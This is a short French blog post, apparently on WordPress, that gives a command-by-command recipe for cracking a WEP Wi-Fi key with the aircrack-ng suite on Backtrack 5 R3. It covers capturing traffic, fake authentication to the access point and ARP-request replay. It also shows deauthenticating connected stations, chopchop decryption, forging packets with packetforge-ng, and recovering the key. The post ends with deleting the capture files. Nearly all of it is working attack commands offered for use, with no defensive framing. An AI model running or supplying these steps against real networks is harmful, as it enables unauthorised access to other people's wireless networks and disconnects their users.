[Backtrack 5 R3] Aircrack-ng Crack WEP

1.Intialisez la carte wlan0

Sauvegardez raz dans « root »
(wlan0 par default,changez sinon le fichier raz)

Dans un terminal tapez:
bash raz

2.Analysez les réseaux wifi

airodump-ng mon0

3.Capturer les paquets (changer le canal,ici le 6)
airodump-ng -c 6 -w capture — encrypt wep mon0

—————
Ensuite 2 méthodes:

Méthode 1
ARP-Request 

Fake authentication with AP (-1)
aireplay-ng -1 1 -e ESSID mon0

ARP-request replay (-3)
aireplay-ng -3 -e ESSID mon0

Si une station est présente,utiliser

Deauthenticate Stations (-0)
aireplay-ng -0 1 -e ESSID mon0

Méthode 2
Chopchop WEP Packet

Fake authentication with AP (-1)
aireplay-ng -1 1 -e ESSID mon0

decrypt/chopchop WEP packet (-4)
aireplay-ng -4 -e ESSID -h @MacCarteWifi mon0

packetforge-ng -0 -a BSSID -h @MacCarteWifi
-k 255.255.255.255 -l 255.255.255.255
-y replay-obtenu.xor -w arp.cap

aireplay-ng -2 -r arp.cap -h @MacCarteWifi mon0

—————

4.Crack

aircrack-ng -z *.cap

5.Supprimer les fichiers .cap .xor etc…
Sauvegardez rm dans « root »

Dans un terminal tapez:
bash rm

Enjoy !

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l'aide de votre compte WordPress.com. Déconnexion / Changer )

Image Twitter

Vous commentez à l'aide de votre compte Twitter. Déconnexion / Changer )

Photo Facebook

Vous commentez à l'aide de votre compte Facebook. Déconnexion / Changer )

Photo Google+

Vous commentez à l'aide de votre compte Google+. Déconnexion / Changer )

Connexion à %s

Créez un site ou un blog sur WordPress.com

Retour en haut ↑

%d blogueurs aiment cette page :